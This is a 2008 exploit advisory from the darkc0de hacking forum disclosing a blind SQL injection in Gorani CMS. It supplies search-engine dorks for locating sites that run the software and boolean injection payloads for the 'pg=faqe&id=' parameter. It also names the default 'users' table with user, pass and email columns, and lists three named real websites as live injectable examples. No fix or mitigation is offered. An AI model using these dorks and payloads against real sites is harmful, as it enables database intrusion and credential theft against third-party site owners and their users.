Gorani CMS suffers from a blind SQL injection vulnerability.
b40acb094b1af6eac7f1763d52e1c058a506e292ff82be44e50cdc03591c5354
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
#
# Author: baltazar and sinner_01
#
# Home : www.darkc0de.com & ljuska.org
#
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com
#
# Share the c0de!
#
################################################################
#
# App Name: Gorani CMS
#
# App Home: http://www.gorani.net/web/index.php
#
# Dork: intext:Built by Gorani.net
# Dork: inurl:/index.php?pg=faqe
#
# POC: index.php?pg=faqe&id=1+and+1=1
# index.php?pg=faqe&id=1+and+1=2
#
# Default table name : users
#
# Default columns name : user,pass,email
#
# Example:
#
#http://www.studiobraka.com/index.php?pg=faqe&id=1+and+1=1
#http://www.studiobraka.com/index.php?pg=faqe&id=1+and+1=2
#
#http://www.dimal.al/index.php?pg=faqe&id=7+and+1=1
#http://www.dimal.al/index.php?pg=faqe&id=7+and+1=2
#
#http://www.eurocolservice.com/index.php?pg=faqe&id=7+and+1=1
#http://www.eurocolservice.com/index.php?pg=faqe&id=7+and+1=2
#
################################################################
# #
# Greetz To United Jugoslavija Crew #
# #
################################################################
# Vuln Discovered 04/15/2008